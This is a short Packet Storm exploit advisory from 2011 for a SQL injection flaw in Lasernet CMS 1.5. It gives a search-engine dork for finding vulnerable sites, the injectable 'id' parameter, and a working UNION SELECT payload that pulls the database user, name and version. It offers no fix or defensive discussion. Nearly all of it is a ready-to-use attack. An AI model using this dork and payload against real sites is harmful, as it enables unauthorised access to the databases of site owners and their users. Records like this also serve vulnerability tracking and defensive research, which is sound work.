Lasernet CMS 1.5 SQL Injection

2011-08-09T00:00:00
ID PACKETSTORM:103827
Type packetstorm
Reporter p0pc0rn
Modified 2011-08-09T00:00:00

Description

                                        
                                            `Title : LASERnet CMS Vulnerable to SQL Injection  
Vendor : http://lasernet.gr/cms.php  
Dork : intext:"Powered by Lasernet"  
Category: WebApps  
  
http://localhost.com/index.php?id=[SQL]  
  
Demo:  
http://localhost.com/index.php  
?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+  
  
  
`